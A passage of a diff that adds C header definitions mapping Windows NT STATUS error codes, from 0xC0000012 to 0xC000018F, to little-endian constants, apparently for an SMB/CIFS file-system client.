++#define STATUS_WRONG_VOLUME cpu_to_le32(0xC0000012)
++#define STATUS_NO_MEDIA_IN_DEVICE cpu_to_le32(0xC0000013)
++#define STATUS_UNRECOGNIZED_MEDIA cpu_to_le32(0xC0000014)
++#define STATUS_NONEXISTENT_SECTOR cpu_to_le32(0xC0000015)
++#define STATUS_MORE_PROCESSING_REQUIRED cpu_to_le32(0xC0000016)
++#define STATUS_NO_MEMORY cpu_to_le32(0xC0000017)
++#define STATUS_CONFLICTING_ADDRESSES cpu_to_le32(0xC0000018)
++#define STATUS_NOT_MAPPED_VIEW cpu_to_le32(0xC0000019)
++#define STATUS_UNABLE_TO_FREE_VM cpu_to_le32(0xC000001A)
++#define STATUS_UNABLE_TO_DELETE_SECTION cpu_to_le32(0xC000001B)
++#define STATUS_INVALID_SYSTEM_SERVICE cpu_to_le32(0xC000001C)
++#define STATUS_ILLEGAL_INSTRUCTION cpu_to_le32(0xC000001D)
++#define STATUS_INVALID_LOCK_SEQUENCE cpu_to_le32(0xC000001E)
++#define STATUS_INVALID_VIEW_SIZE cpu_to_le32(0xC000001F)
++#define STATUS_INVALID_FILE_FOR_SECTION cpu_to_le32(0xC0000020)
++#define STATUS_ALREADY_COMMITTED cpu_to_le32(0xC0000021)
++#define STATUS_ACCESS_DENIED cpu_to_le32(0xC0000022)
++#define STATUS_BUFFER_TOO_SMALL cpu_to_le32(0xC0000023)
++#define STATUS_OBJECT_TYPE_MISMATCH cpu_to_le32(0xC0000024)
++#define STATUS_NONCONTINUABLE_EXCEPTION cpu_to_le32(0xC0000025)
++#define STATUS_INVALID_DISPOSITION cpu_to_le32(0xC0000026)
++#define STATUS_UNWIND cpu_to_le32(0xC0000027)
++#define STATUS_BAD_STACK cpu_to_le32(0xC0000028)
++#define STATUS_INVALID_UNWIND_TARGET cpu_to_le32(0xC0000029)
++#define STATUS_NOT_LOCKED cpu_to_le32(0xC000002A)
++#define STATUS_PARITY_ERROR cpu_to_le32(0xC000002B)
++#define STATUS_UNABLE_TO_DECOMMIT_VM cpu_to_le32(0xC000002C)
++#define STATUS_NOT_COMMITTED cpu_to_le32(0xC000002D)
++#define STATUS_INVALID_PORT_ATTRIBUTES cpu_to_le32(0xC000002E)
++#define STATUS_PORT_MESSAGE_TOO_LONG cpu_to_le32(0xC000002F)
++#define STATUS_INVALID_PARAMETER_MIX cpu_to_le32(0xC0000030)
++#define STATUS_INVALID_QUOTA_LOWER cpu_to_le32(0xC0000031)
++#define STATUS_DISK_CORRUPT_ERROR cpu_to_le32(0xC0000032)
++#define STATUS_OBJECT_NAME_INVALID cpu_to_le32(0xC0000033)
++#define STATUS_OBJECT_NAME_NOT_FOUND cpu_to_le32(0xC0000034)
++#define STATUS_OBJECT_NAME_COLLISION cpu_to_le32(0xC0000035)
++#define STATUS_PORT_DISCONNECTED cpu_to_le32(0xC0000037)
++#define STATUS_DEVICE_ALREADY_ATTACHED cpu_to_le32(0xC0000038)
++#define STATUS_OBJECT_PATH_INVALID cpu_to_le32(0xC0000039)
++#define STATUS_OBJECT_PATH_NOT_FOUND cpu_to_le32(0xC000003A)
++#define STATUS_OBJECT_PATH_SYNTAX_BAD cpu_to_le32(0xC000003B)
++#define STATUS_DATA_OVERRUN cpu_to_le32(0xC000003C)
++#define STATUS_DATA_LATE_ERROR cpu_to_le32(0xC000003D)
++#define STATUS_DATA_ERROR cpu_to_le32(0xC000003E)
++#define STATUS_CRC_ERROR cpu_to_le32(0xC000003F)
++#define STATUS_SECTION_TOO_BIG cpu_to_le32(0xC0000040)
++#define STATUS_PORT_CONNECTION_REFUSED cpu_to_le32(0xC0000041)
++#define STATUS_INVALID_PORT_HANDLE cpu_to_le32(0xC0000042)
++#define STATUS_SHARING_VIOLATION cpu_to_le32(0xC0000043)
++#define STATUS_QUOTA_EXCEEDED cpu_to_le32(0xC0000044)
++#define STATUS_INVALID_PAGE_PROTECTION cpu_to_le32(0xC0000045)
++#define STATUS_MUTANT_NOT_OWNED cpu_to_le32(0xC0000046)
++#define STATUS_SEMAPHORE_LIMIT_EXCEEDED cpu_to_le32(0xC0000047)
++#define STATUS_PORT_ALREADY_SET cpu_to_le32(0xC0000048)
++#define STATUS_SECTION_NOT_IMAGE cpu_to_le32(0xC0000049)
++#define STATUS_SUSPEND_COUNT_EXCEEDED cpu_to_le32(0xC000004A)
++#define STATUS_THREAD_IS_TERMINATING cpu_to_le32(0xC000004B)
++#define STATUS_BAD_WORKING_SET_LIMIT cpu_to_le32(0xC000004C)
++#define STATUS_INCOMPATIBLE_FILE_MAP cpu_to_le32(0xC000004D)
++#define STATUS_SECTION_PROTECTION cpu_to_le32(0xC000004E)
++#define STATUS_EAS_NOT_SUPPORTED cpu_to_le32(0xC000004F)
++#define STATUS_EA_TOO_LARGE cpu_to_le32(0xC0000050)
++#define STATUS_NONEXISTENT_EA_ENTRY cpu_to_le32(0xC0000051)
++#define STATUS_NO_EAS_ON_FILE cpu_to_le32(0xC0000052)
++#define STATUS_EA_CORRUPT_ERROR cpu_to_le32(0xC0000053)
++#define STATUS_FILE_LOCK_CONFLICT cpu_to_le32(0xC0000054)
++#define STATUS_LOCK_NOT_GRANTED cpu_to_le32(0xC0000055)
++#define STATUS_DELETE_PENDING cpu_to_le32(0xC0000056)
++#define STATUS_CTL_FILE_NOT_SUPPORTED cpu_to_le32(0xC0000057)
++#define STATUS_UNKNOWN_REVISION cpu_to_le32(0xC0000058)
++#define STATUS_REVISION_MISMATCH cpu_to_le32(0xC0000059)
++#define STATUS_INVALID_OWNER cpu_to_le32(0xC000005A)
++#define STATUS_INVALID_PRIMARY_GROUP cpu_to_le32(0xC000005B)
++#define STATUS_NO_IMPERSONATION_TOKEN cpu_to_le32(0xC000005C)
++#define STATUS_CANT_DISABLE_MANDATORY cpu_to_le32(0xC000005D)
++#define STATUS_NO_LOGON_SERVERS cpu_to_le32(0xC000005E)
++#define STATUS_NO_SUCH_LOGON_SESSION cpu_to_le32(0xC000005F)
++#define STATUS_NO_SUCH_PRIVILEGE cpu_to_le32(0xC0000060)
++#define STATUS_PRIVILEGE_NOT_HELD cpu_to_le32(0xC0000061)
++#define STATUS_INVALID_ACCOUNT_NAME cpu_to_le32(0xC0000062)
++#define STATUS_USER_EXISTS cpu_to_le32(0xC0000063)
++#define STATUS_NO_SUCH_USER cpu_to_le32(0xC0000064)
++#define STATUS_GROUP_EXISTS cpu_to_le32(0xC0000065)
++#define STATUS_NO_SUCH_GROUP cpu_to_le32(0xC0000066)
++#define STATUS_MEMBER_IN_GROUP cpu_to_le32(0xC0000067)
++#define STATUS_MEMBER_NOT_IN_GROUP cpu_to_le32(0xC0000068)
++#define STATUS_LAST_ADMIN cpu_to_le32(0xC0000069)
++#define STATUS_WRONG_PASSWORD cpu_to_le32(0xC000006A)
++#define STATUS_ILL_FORMED_PASSWORD cpu_to_le32(0xC000006B)
++#define STATUS_PASSWORD_RESTRICTION cpu_to_le32(0xC000006C)
++#define STATUS_LOGON_FAILURE cpu_to_le32(0xC000006D)
++#define STATUS_ACCOUNT_RESTRICTION cpu_to_le32(0xC000006E)
++#define STATUS_INVALID_LOGON_HOURS cpu_to_le32(0xC000006F)
++#define STATUS_INVALID_WORKSTATION cpu_to_le32(0xC0000070)
++#define STATUS_PASSWORD_EXPIRED cpu_to_le32(0xC0000071)
++#define STATUS_ACCOUNT_DISABLED cpu_to_le32(0xC0000072)
++#define STATUS_NONE_MAPPED cpu_to_le32(0xC0000073)
++#define STATUS_TOO_MANY_LUIDS_REQUESTED cpu_to_le32(0xC0000074)
++#define STATUS_LUIDS_EXHAUSTED cpu_to_le32(0xC0000075)
++#define STATUS_INVALID_SUB_AUTHORITY cpu_to_le32(0xC0000076)
++#define STATUS_INVALID_ACL cpu_to_le32(0xC0000077)
++#define STATUS_INVALID_SID cpu_to_le32(0xC0000078)
++#define STATUS_INVALID_SECURITY_DESCR cpu_to_le32(0xC0000079)
++#define STATUS_PROCEDURE_NOT_FOUND cpu_to_le32(0xC000007A)
++#define STATUS_INVALID_IMAGE_FORMAT cpu_to_le32(0xC000007B)
++#define STATUS_NO_TOKEN cpu_to_le32(0xC000007C)
++#define STATUS_BAD_INHERITANCE_ACL cpu_to_le32(0xC000007D)
++#define STATUS_RANGE_NOT_LOCKED cpu_to_le32(0xC000007E)
++#define STATUS_DISK_FULL cpu_to_le32(0xC000007F)
++#define STATUS_SERVER_DISABLED cpu_to_le32(0xC0000080)
++#define STATUS_SERVER_NOT_DISABLED cpu_to_le32(0xC0000081)
++#define STATUS_TOO_MANY_GUIDS_REQUESTED cpu_to_le32(0xC0000082)
++#define STATUS_GUIDS_EXHAUSTED cpu_to_le32(0xC0000083)
++#define STATUS_INVALID_ID_AUTHORITY cpu_to_le32(0xC0000084)
++#define STATUS_AGENTS_EXHAUSTED cpu_to_le32(0xC0000085)
++#define STATUS_INVALID_VOLUME_LABEL cpu_to_le32(0xC0000086)
++#define STATUS_SECTION_NOT_EXTENDED cpu_to_le32(0xC0000087)
++#define STATUS_NOT_MAPPED_DATA cpu_to_le32(0xC0000088)
++#define STATUS_RESOURCE_DATA_NOT_FOUND cpu_to_le32(0xC0000089)
++#define STATUS_RESOURCE_TYPE_NOT_FOUND cpu_to_le32(0xC000008A)
++#define STATUS_RESOURCE_NAME_NOT_FOUND cpu_to_le32(0xC000008B)
++#define STATUS_ARRAY_BOUNDS_EXCEEDED cpu_to_le32(0xC000008C)
++#define STATUS_FLOAT_DENORMAL_OPERAND cpu_to_le32(0xC000008D)
++#define STATUS_FLOAT_DIVIDE_BY_ZERO cpu_to_le32(0xC000008E)
++#define STATUS_FLOAT_INEXACT_RESULT cpu_to_le32(0xC000008F)
++#define STATUS_FLOAT_INVALID_OPERATION cpu_to_le32(0xC0000090)
++#define STATUS_FLOAT_OVERFLOW cpu_to_le32(0xC0000091)
++#define STATUS_FLOAT_STACK_CHECK cpu_to_le32(0xC0000092)
++#define STATUS_FLOAT_UNDERFLOW cpu_to_le32(0xC0000093)
++#define STATUS_INTEGER_DIVIDE_BY_ZERO cpu_to_le32(0xC0000094)
++#define STATUS_INTEGER_OVERFLOW cpu_to_le32(0xC0000095)
++#define STATUS_PRIVILEGED_INSTRUCTION cpu_to_le32(0xC0000096)
++#define STATUS_TOO_MANY_PAGING_FILES cpu_to_le32(0xC0000097)
++#define STATUS_FILE_INVALID cpu_to_le32(0xC0000098)
++#define STATUS_ALLOTTED_SPACE_EXCEEDED cpu_to_le32(0xC0000099)
++#define STATUS_INSUFFICIENT_RESOURCES cpu_to_le32(0xC000009A)
++#define STATUS_DFS_EXIT_PATH_FOUND cpu_to_le32(0xC000009B)
++#define STATUS_DEVICE_DATA_ERROR cpu_to_le32(0xC000009C)
++#define STATUS_DEVICE_NOT_CONNECTED cpu_to_le32(0xC000009D)
++#define STATUS_DEVICE_POWER_FAILURE cpu_to_le32(0xC000009E)
++#define STATUS_FREE_VM_NOT_AT_BASE cpu_to_le32(0xC000009F)
++#define STATUS_MEMORY_NOT_ALLOCATED cpu_to_le32(0xC00000A0)
++#define STATUS_WORKING_SET_QUOTA cpu_to_le32(0xC00000A1)
++#define STATUS_MEDIA_WRITE_PROTECTED cpu_to_le32(0xC00000A2)
++#define STATUS_DEVICE_NOT_READY cpu_to_le32(0xC00000A3)
++#define STATUS_INVALID_GROUP_ATTRIBUTES cpu_to_le32(0xC00000A4)
++#define STATUS_BAD_IMPERSONATION_LEVEL cpu_to_le32(0xC00000A5)
++#define STATUS_CANT_OPEN_ANONYMOUS cpu_to_le32(0xC00000A6)
++#define STATUS_BAD_VALIDATION_CLASS cpu_to_le32(0xC00000A7)
++#define STATUS_BAD_TOKEN_TYPE cpu_to_le32(0xC00000A8)
++#define STATUS_BAD_MASTER_BOOT_RECORD cpu_to_le32(0xC00000A9)
++#define STATUS_INSTRUCTION_MISALIGNMENT cpu_to_le32(0xC00000AA)
++#define STATUS_INSTANCE_NOT_AVAILABLE cpu_to_le32(0xC00000AB)
++#define STATUS_PIPE_NOT_AVAILABLE cpu_to_le32(0xC00000AC)
++#define STATUS_INVALID_PIPE_STATE cpu_to_le32(0xC00000AD)
++#define STATUS_PIPE_BUSY cpu_to_le32(0xC00000AE)
++#define STATUS_ILLEGAL_FUNCTION cpu_to_le32(0xC00000AF)
++#define STATUS_PIPE_DISCONNECTED cpu_to_le32(0xC00000B0)
++#define STATUS_PIPE_CLOSING cpu_to_le32(0xC00000B1)
++#define STATUS_PIPE_CONNECTED cpu_to_le32(0xC00000B2)
++#define STATUS_PIPE_LISTENING cpu_to_le32(0xC00000B3)
++#define STATUS_INVALID_READ_MODE cpu_to_le32(0xC00000B4)
++#define STATUS_IO_TIMEOUT cpu_to_le32(0xC00000B5)
++#define STATUS_FILE_FORCED_CLOSED cpu_to_le32(0xC00000B6)
++#define STATUS_PROFILING_NOT_STARTED cpu_to_le32(0xC00000B7)
++#define STATUS_PROFILING_NOT_STOPPED cpu_to_le32(0xC00000B8)
++#define STATUS_COULD_NOT_INTERPRET cpu_to_le32(0xC00000B9)
++#define STATUS_FILE_IS_A_DIRECTORY cpu_to_le32(0xC00000BA)
++#define STATUS_NOT_SUPPORTED cpu_to_le32(0xC00000BB)
++#define STATUS_REMOTE_NOT_LISTENING cpu_to_le32(0xC00000BC)
++#define STATUS_DUPLICATE_NAME cpu_to_le32(0xC00000BD)
++#define STATUS_BAD_NETWORK_PATH cpu_to_le32(0xC00000BE)
++#define STATUS_NETWORK_BUSY cpu_to_le32(0xC00000BF)
++#define STATUS_DEVICE_DOES_NOT_EXIST cpu_to_le32(0xC00000C0)
++#define STATUS_TOO_MANY_COMMANDS cpu_to_le32(0xC00000C1)
++#define STATUS_ADAPTER_HARDWARE_ERROR cpu_to_le32(0xC00000C2)
++#define STATUS_INVALID_NETWORK_RESPONSE cpu_to_le32(0xC00000C3)
++#define STATUS_UNEXPECTED_NETWORK_ERROR cpu_to_le32(0xC00000C4)
++#define STATUS_BAD_REMOTE_ADAPTER cpu_to_le32(0xC00000C5)
++#define STATUS_PRINT_QUEUE_FULL cpu_to_le32(0xC00000C6)
++#define STATUS_NO_SPOOL_SPACE cpu_to_le32(0xC00000C7)
++#define STATUS_PRINT_CANCELLED cpu_to_le32(0xC00000C8)
++#define STATUS_NETWORK_NAME_DELETED cpu_to_le32(0xC00000C9)
++#define STATUS_NETWORK_ACCESS_DENIED cpu_to_le32(0xC00000CA)
++#define STATUS_BAD_DEVICE_TYPE cpu_to_le32(0xC00000CB)
++#define STATUS_BAD_NETWORK_NAME cpu_to_le32(0xC00000CC)
++#define STATUS_TOO_MANY_NAMES cpu_to_le32(0xC00000CD)
++#define STATUS_TOO_MANY_SESSIONS cpu_to_le32(0xC00000CE)
++#define STATUS_SHARING_PAUSED cpu_to_le32(0xC00000CF)
++#define STATUS_REQUEST_NOT_ACCEPTED cpu_to_le32(0xC00000D0)
++#define STATUS_REDIRECTOR_PAUSED cpu_to_le32(0xC00000D1)
++#define STATUS_NET_WRITE_FAULT cpu_to_le32(0xC00000D2)
++#define STATUS_PROFILING_AT_LIMIT cpu_to_le32(0xC00000D3)
++#define STATUS_NOT_SAME_DEVICE cpu_to_le32(0xC00000D4)
++#define STATUS_FILE_RENAMED cpu_to_le32(0xC00000D5)
++#define STATUS_VIRTUAL_CIRCUIT_CLOSED cpu_to_le32(0xC00000D6)
++#define STATUS_NO_SECURITY_ON_OBJECT cpu_to_le32(0xC00000D7)
++#define STATUS_CANT_WAIT cpu_to_le32(0xC00000D8)
++#define STATUS_PIPE_EMPTY cpu_to_le32(0xC00000D9)
++#define STATUS_CANT_ACCESS_DOMAIN_INFO cpu_to_le32(0xC00000DA)
++#define STATUS_CANT_TERMINATE_SELF cpu_to_le32(0xC00000DB)
++#define STATUS_INVALID_SERVER_STATE cpu_to_le32(0xC00000DC)
++#define STATUS_INVALID_DOMAIN_STATE cpu_to_le32(0xC00000DD)
++#define STATUS_INVALID_DOMAIN_ROLE cpu_to_le32(0xC00000DE)
++#define STATUS_NO_SUCH_DOMAIN cpu_to_le32(0xC00000DF)
++#define STATUS_DOMAIN_EXISTS cpu_to_le32(0xC00000E0)
++#define STATUS_DOMAIN_LIMIT_EXCEEDED cpu_to_le32(0xC00000E1)
++#define STATUS_OPLOCK_NOT_GRANTED cpu_to_le32(0xC00000E2)
++#define STATUS_INVALID_OPLOCK_PROTOCOL cpu_to_le32(0xC00000E3)
++#define STATUS_INTERNAL_DB_CORRUPTION cpu_to_le32(0xC00000E4)
++#define STATUS_INTERNAL_ERROR cpu_to_le32(0xC00000E5)
++#define STATUS_GENERIC_NOT_MAPPED cpu_to_le32(0xC00000E6)
++#define STATUS_BAD_DESCRIPTOR_FORMAT cpu_to_le32(0xC00000E7)
++#define STATUS_INVALID_USER_BUFFER cpu_to_le32(0xC00000E8)
++#define STATUS_UNEXPECTED_IO_ERROR cpu_to_le32(0xC00000E9)
++#define STATUS_UNEXPECTED_MM_CREATE_ERR cpu_to_le32(0xC00000EA)
++#define STATUS_UNEXPECTED_MM_MAP_ERROR cpu_to_le32(0xC00000EB)
++#define STATUS_UNEXPECTED_MM_EXTEND_ERR cpu_to_le32(0xC00000EC)
++#define STATUS_NOT_LOGON_PROCESS cpu_to_le32(0xC00000ED)
++#define STATUS_LOGON_SESSION_EXISTS cpu_to_le32(0xC00000EE)
++#define STATUS_INVALID_PARAMETER_1 cpu_to_le32(0xC00000EF)
++#define STATUS_INVALID_PARAMETER_2 cpu_to_le32(0xC00000F0)
++#define STATUS_INVALID_PARAMETER_3 cpu_to_le32(0xC00000F1)
++#define STATUS_INVALID_PARAMETER_4 cpu_to_le32(0xC00000F2)
++#define STATUS_INVALID_PARAMETER_5 cpu_to_le32(0xC00000F3)
++#define STATUS_INVALID_PARAMETER_6 cpu_to_le32(0xC00000F4)
++#define STATUS_INVALID_PARAMETER_7 cpu_to_le32(0xC00000F5)
++#define STATUS_INVALID_PARAMETER_8 cpu_to_le32(0xC00000F6)
++#define STATUS_INVALID_PARAMETER_9 cpu_to_le32(0xC00000F7)
++#define STATUS_INVALID_PARAMETER_10 cpu_to_le32(0xC00000F8)
++#define STATUS_INVALID_PARAMETER_11 cpu_to_le32(0xC00000F9)
++#define STATUS_INVALID_PARAMETER_12 cpu_to_le32(0xC00000FA)
++#define STATUS_REDIRECTOR_NOT_STARTED cpu_to_le32(0xC00000FB)
++#define STATUS_REDIRECTOR_STARTED cpu_to_le32(0xC00000FC)
++#define STATUS_STACK_OVERFLOW cpu_to_le32(0xC00000FD)
++#define STATUS_NO_SUCH_PACKAGE cpu_to_le32(0xC00000FE)
++#define STATUS_BAD_FUNCTION_TABLE cpu_to_le32(0xC00000FF)
++#define STATUS_VARIABLE_NOT_FOUND cpu_to_le32(0xC0000100)
++#define STATUS_DIRECTORY_NOT_EMPTY cpu_to_le32(0xC0000101)
++#define STATUS_FILE_CORRUPT_ERROR cpu_to_le32(0xC0000102)
++#define STATUS_NOT_A_DIRECTORY cpu_to_le32(0xC0000103)
++#define STATUS_BAD_LOGON_SESSION_STATE cpu_to_le32(0xC0000104)
++#define STATUS_LOGON_SESSION_COLLISION cpu_to_le32(0xC0000105)
++#define STATUS_NAME_TOO_LONG cpu_to_le32(0xC0000106)
++#define STATUS_FILES_OPEN cpu_to_le32(0xC0000107)
++#define STATUS_CONNECTION_IN_USE cpu_to_le32(0xC0000108)
++#define STATUS_MESSAGE_NOT_FOUND cpu_to_le32(0xC0000109)
++#define STATUS_PROCESS_IS_TERMINATING cpu_to_le32(0xC000010A)
++#define STATUS_INVALID_LOGON_TYPE cpu_to_le32(0xC000010B)
++#define STATUS_NO_GUID_TRANSLATION cpu_to_le32(0xC000010C)
++#define STATUS_CANNOT_IMPERSONATE cpu_to_le32(0xC000010D)
++#define STATUS_IMAGE_ALREADY_LOADED cpu_to_le32(0xC000010E)
++#define STATUS_ABIOS_NOT_PRESENT cpu_to_le32(0xC000010F)
++#define STATUS_ABIOS_LID_NOT_EXIST cpu_to_le32(0xC0000110)
++#define STATUS_ABIOS_LID_ALREADY_OWNED cpu_to_le32(0xC0000111)
++#define STATUS_ABIOS_NOT_LID_OWNER cpu_to_le32(0xC0000112)
++#define STATUS_ABIOS_INVALID_COMMAND cpu_to_le32(0xC0000113)
++#define STATUS_ABIOS_INVALID_LID cpu_to_le32(0xC0000114)
++#define STATUS_ABIOS_SELECTOR_NOT_AVAILABLE cpu_to_le32(0xC0000115)
++#define STATUS_ABIOS_INVALID_SELECTOR cpu_to_le32(0xC0000116)
++#define STATUS_NO_LDT cpu_to_le32(0xC0000117)
++#define STATUS_INVALID_LDT_SIZE cpu_to_le32(0xC0000118)
++#define STATUS_INVALID_LDT_OFFSET cpu_to_le32(0xC0000119)
++#define STATUS_INVALID_LDT_DESCRIPTOR cpu_to_le32(0xC000011A)
++#define STATUS_INVALID_IMAGE_NE_FORMAT cpu_to_le32(0xC000011B)
++#define STATUS_RXACT_INVALID_STATE cpu_to_le32(0xC000011C)
++#define STATUS_RXACT_COMMIT_FAILURE cpu_to_le32(0xC000011D)
++#define STATUS_MAPPED_FILE_SIZE_ZERO cpu_to_le32(0xC000011E)
++#define STATUS_TOO_MANY_OPENED_FILES cpu_to_le32(0xC000011F)
++#define STATUS_CANCELLED cpu_to_le32(0xC0000120)
++#define STATUS_CANNOT_DELETE cpu_to_le32(0xC0000121)
++#define STATUS_INVALID_COMPUTER_NAME cpu_to_le32(0xC0000122)
++#define STATUS_FILE_DELETED cpu_to_le32(0xC0000123)
++#define STATUS_SPECIAL_ACCOUNT cpu_to_le32(0xC0000124)
++#define STATUS_SPECIAL_GROUP cpu_to_le32(0xC0000125)
++#define STATUS_SPECIAL_USER cpu_to_le32(0xC0000126)
++#define STATUS_MEMBERS_PRIMARY_GROUP cpu_to_le32(0xC0000127)
++#define STATUS_FILE_CLOSED cpu_to_le32(0xC0000128)
++#define STATUS_TOO_MANY_THREADS cpu_to_le32(0xC0000129)
++#define STATUS_THREAD_NOT_IN_PROCESS cpu_to_le32(0xC000012A)
++#define STATUS_TOKEN_ALREADY_IN_USE cpu_to_le32(0xC000012B)
++#define STATUS_PAGEFILE_QUOTA_EXCEEDED cpu_to_le32(0xC000012C)
++#define STATUS_COMMITMENT_LIMIT cpu_to_le32(0xC000012D)
++#define STATUS_INVALID_IMAGE_LE_FORMAT cpu_to_le32(0xC000012E)
++#define STATUS_INVALID_IMAGE_NOT_MZ cpu_to_le32(0xC000012F)
++#define STATUS_INVALID_IMAGE_PROTECT cpu_to_le32(0xC0000130)
++#define STATUS_INVALID_IMAGE_WIN_16 cpu_to_le32(0xC0000131)
++#define STATUS_LOGON_SERVER_CONFLICT cpu_to_le32(0xC0000132)
++#define STATUS_TIME_DIFFERENCE_AT_DC cpu_to_le32(0xC0000133)
++#define STATUS_SYNCHRONIZATION_REQUIRED cpu_to_le32(0xC0000134)
++#define STATUS_DLL_NOT_FOUND cpu_to_le32(0xC0000135)
++#define STATUS_OPEN_FAILED cpu_to_le32(0xC0000136)
++#define STATUS_IO_PRIVILEGE_FAILED cpu_to_le32(0xC0000137)
++#define STATUS_ORDINAL_NOT_FOUND cpu_to_le32(0xC0000138)
++#define STATUS_ENTRYPOINT_NOT_FOUND cpu_to_le32(0xC0000139)
++#define STATUS_CONTROL_C_EXIT cpu_to_le32(0xC000013A)
++#define STATUS_LOCAL_DISCONNECT cpu_to_le32(0xC000013B)
++#define STATUS_REMOTE_DISCONNECT cpu_to_le32(0xC000013C)
++#define STATUS_REMOTE_RESOURCES cpu_to_le32(0xC000013D)
++#define STATUS_LINK_FAILED cpu_to_le32(0xC000013E)
++#define STATUS_LINK_TIMEOUT cpu_to_le32(0xC000013F)
++#define STATUS_INVALID_CONNECTION cpu_to_le32(0xC0000140)
++#define STATUS_INVALID_ADDRESS cpu_to_le32(0xC0000141)
++#define STATUS_DLL_INIT_FAILED cpu_to_le32(0xC0000142)
++#define STATUS_MISSING_SYSTEMFILE cpu_to_le32(0xC0000143)
++#define STATUS_UNHANDLED_EXCEPTION cpu_to_le32(0xC0000144)
++#define STATUS_APP_INIT_FAILURE cpu_to_le32(0xC0000145)
++#define STATUS_PAGEFILE_CREATE_FAILED cpu_to_le32(0xC0000146)
++#define STATUS_NO_PAGEFILE cpu_to_le32(0xC0000147)
++#define STATUS_INVALID_LEVEL cpu_to_le32(0xC0000148)
++#define STATUS_WRONG_PASSWORD_CORE cpu_to_le32(0xC0000149)
++#define STATUS_ILLEGAL_FLOAT_CONTEXT cpu_to_le32(0xC000014A)
++#define STATUS_PIPE_BROKEN cpu_to_le32(0xC000014B)
++#define STATUS_REGISTRY_CORRUPT cpu_to_le32(0xC000014C)
++#define STATUS_REGISTRY_IO_FAILED cpu_to_le32(0xC000014D)
++#define STATUS_NO_EVENT_PAIR cpu_to_le32(0xC000014E)
++#define STATUS_UNRECOGNIZED_VOLUME cpu_to_le32(0xC000014F)
++#define STATUS_SERIAL_NO_DEVICE_INITED cpu_to_le32(0xC0000150)
++#define STATUS_NO_SUCH_ALIAS cpu_to_le32(0xC0000151)
++#define STATUS_MEMBER_NOT_IN_ALIAS cpu_to_le32(0xC0000152)
++#define STATUS_MEMBER_IN_ALIAS cpu_to_le32(0xC0000153)
++#define STATUS_ALIAS_EXISTS cpu_to_le32(0xC0000154)
++#define STATUS_LOGON_NOT_GRANTED cpu_to_le32(0xC0000155)
++#define STATUS_TOO_MANY_SECRETS cpu_to_le32(0xC0000156)
++#define STATUS_SECRET_TOO_LONG cpu_to_le32(0xC0000157)
++#define STATUS_INTERNAL_DB_ERROR cpu_to_le32(0xC0000158)
++#define STATUS_FULLSCREEN_MODE cpu_to_le32(0xC0000159)
++#define STATUS_TOO_MANY_CONTEXT_IDS cpu_to_le32(0xC000015A)
++#define STATUS_LOGON_TYPE_NOT_GRANTED cpu_to_le32(0xC000015B)
++#define STATUS_NOT_REGISTRY_FILE cpu_to_le32(0xC000015C)
++#define STATUS_NT_CROSS_ENCRYPTION_REQUIRED cpu_to_le32(0xC000015D)
++#define STATUS_DOMAIN_CTRLR_CONFIG_ERROR cpu_to_le32(0xC000015E)
++#define STATUS_FT_MISSING_MEMBER cpu_to_le32(0xC000015F)
++#define STATUS_ILL_FORMED_SERVICE_ENTRY cpu_to_le32(0xC0000160)
++#define STATUS_ILLEGAL_CHARACTER cpu_to_le32(0xC0000161)
++#define STATUS_UNMAPPABLE_CHARACTER cpu_to_le32(0xC0000162)
++#define STATUS_UNDEFINED_CHARACTER cpu_to_le32(0xC0000163)
++#define STATUS_FLOPPY_VOLUME cpu_to_le32(0xC0000164)
++#define STATUS_FLOPPY_ID_MARK_NOT_FOUND cpu_to_le32(0xC0000165)
++#define STATUS_FLOPPY_WRONG_CYLINDER cpu_to_le32(0xC0000166)
++#define STATUS_FLOPPY_UNKNOWN_ERROR cpu_to_le32(0xC0000167)
++#define STATUS_FLOPPY_BAD_REGISTERS cpu_to_le32(0xC0000168)
++#define STATUS_DISK_RECALIBRATE_FAILED cpu_to_le32(0xC0000169)
++#define STATUS_DISK_OPERATION_FAILED cpu_to_le32(0xC000016A)
++#define STATUS_DISK_RESET_FAILED cpu_to_le32(0xC000016B)
++#define STATUS_SHARED_IRQ_BUSY cpu_to_le32(0xC000016C)
++#define STATUS_FT_ORPHANING cpu_to_le32(0xC000016D)
++#define STATUS_BIOS_FAILED_TO_CONNECT_INTERRUPT cpu_to_le32(0xC000016E)
++#define STATUS_PARTITION_FAILURE cpu_to_le32(0xC0000172)
++#define STATUS_INVALID_BLOCK_LENGTH cpu_to_le32(0xC0000173)
++#define STATUS_DEVICE_NOT_PARTITIONED cpu_to_le32(0xC0000174)
++#define STATUS_UNABLE_TO_LOCK_MEDIA cpu_to_le32(0xC0000175)
++#define STATUS_UNABLE_TO_UNLOAD_MEDIA cpu_to_le32(0xC0000176)
++#define STATUS_EOM_OVERFLOW cpu_to_le32(0xC0000177)
++#define STATUS_NO_MEDIA cpu_to_le32(0xC0000178)
++#define STATUS_NO_SUCH_MEMBER cpu_to_le32(0xC000017A)
++#define STATUS_INVALID_MEMBER cpu_to_le32(0xC000017B)
++#define STATUS_KEY_DELETED cpu_to_le32(0xC000017C)
++#define STATUS_NO_LOG_SPACE cpu_to_le32(0xC000017D)
++#define STATUS_TOO_MANY_SIDS cpu_to_le32(0xC000017E)
++#define STATUS_LM_CROSS_ENCRYPTION_REQUIRED cpu_to_le32(0xC000017F)
++#define STATUS_KEY_HAS_CHILDREN cpu_to_le32(0xC0000180)
++#define STATUS_CHILD_MUST_BE_VOLATILE cpu_to_le32(0xC0000181)
++#define STATUS_DEVICE_CONFIGURATION_ERROR cpu_to_le32(0xC0000182)
++#define STATUS_DRIVER_INTERNAL_ERROR cpu_to_le32(0xC0000183)
++#define STATUS_INVALID_DEVICE_STATE cpu_to_le32(0xC0000184)
++#define STATUS_IO_DEVICE_ERROR cpu_to_le32(0xC0000185)
++#define STATUS_DEVICE_PROTOCOL_ERROR cpu_to_le32(0xC0000186)
++#define STATUS_BACKUP_CONTROLLER cpu_to_le32(0xC0000187)
++#define STATUS_LOG_FILE_FULL cpu_to_le32(0xC0000188)
++#define STATUS_TOO_LATE cpu_to_le32(0xC0000189)
++#define STATUS_NO_TRUST_LSA_SECRET cpu_to_le32(0xC000018A)
++#define STATUS_NO_TRUST_SAM_ACCOUNT cpu_to_le32(0xC000018B)
++#define STATUS_TRUSTED_DOMAIN_FAILURE cpu_to_le32(0xC000018C)
++#define STATUS_TRUSTED_RELATIONSHIP_FAILURE cpu_to_le32(0xC000018D)
++#define STATUS_EVENTLOG_FILE_CORRUPT cpu_to_le32(0xC000018E)
++#define STATUS_EVENTLOG_CANT_START cpu_to_le32(0xC000018F)
